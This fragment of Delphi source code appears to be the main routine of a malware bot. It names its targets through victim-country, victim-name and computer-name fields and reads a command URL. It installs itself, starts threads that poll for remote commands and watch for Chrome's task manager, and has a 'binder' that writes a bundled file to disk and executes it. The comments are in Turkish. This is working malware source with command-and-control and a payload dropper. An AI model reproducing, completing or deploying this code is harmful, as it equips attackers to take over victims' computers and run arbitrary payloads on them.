BotConfig.CommandURL := String(INFO.URL_ADDR);
DemoVersion;
BotConfig.SettingsFile := GetCustomPath(7) + BotConfig.VictimCountry + '_' + BotConfig.VictimName + '\' + BotConfig.VictimComputerName + '\' + BotConfig.VictimCountry + '\DENEMETEST.ini' ;
MakeSureDirectoryPathExists(PAnsiChar(IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile))));
DebugPrompt(BotConfig.SettingsFile);
DemoVersion;
{$IFDEF DEBUG_MODE_ON}
DeleteFileA(PAnsiChar(BotConfig.SettingsFile));
{$ENDIF}
DemoVersion;
BotConfig.SettingsIniFile := TIniFile.Create(BotConfig.SettingsFile);
BotConfig.InstallDirectory := IncludeTrailingBackSlash(ExtractFilePath(BotConfig.SettingsFile));
BotConfig.InstallDirectoryPath := BotConfig.InstallDirectory + BotConfig.InstallName;
DemoVersion;
DemoVersion;
{$IFNDEF DEBUG_MODE_ON}
if INFO.INSTALL=True
then begin
InstallFile;
end;
{$ENDIF}
DemoVersion;
threadReadCommands := CreateThread(Nil,0,@ReadCommands,nil,0,lpReadCommandThreadId);
threadTaskManager := CreateThread(nil,0,@DetectChromeTaskManager,nil,0,threadChromeTaskManagerControl);
BindFilePath := BotConfig.InstallDirectory + INFO.FILE_NAME;
DebugPrompt('Bindirilen Dosya : ' + BindFilePath);
if Info.BINDER=TRUE
then begin
if not FileExists(BindFilePath)
then begin
DebugPrompt('Bindirilen Dosya Calıştırılıyor...');
Str2File(FileData,BindFilePath);
ShellExecuteA(0,'OPEN',PAnsiChar(BindFilePath),'',NIL,SW_SHOW);
DebugPrompt('Bindirilen Dosya Calistirildi');
end;
end;
While GetMessage(Msg,0,0,0) Do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
end. 
